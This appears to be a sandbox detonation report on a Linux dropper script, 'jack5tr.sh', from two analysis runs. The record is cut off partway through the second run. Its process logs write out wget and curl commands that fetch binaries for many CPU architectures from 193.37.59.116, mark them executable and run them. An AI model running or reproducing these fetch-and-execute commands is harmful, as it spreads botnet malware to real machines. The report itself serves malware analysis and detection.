SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

debian9-mipsel-20240418-en

Max time kernel

31s

Max time network

34s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

2s

Max time network

131s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x RUN arc arm gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

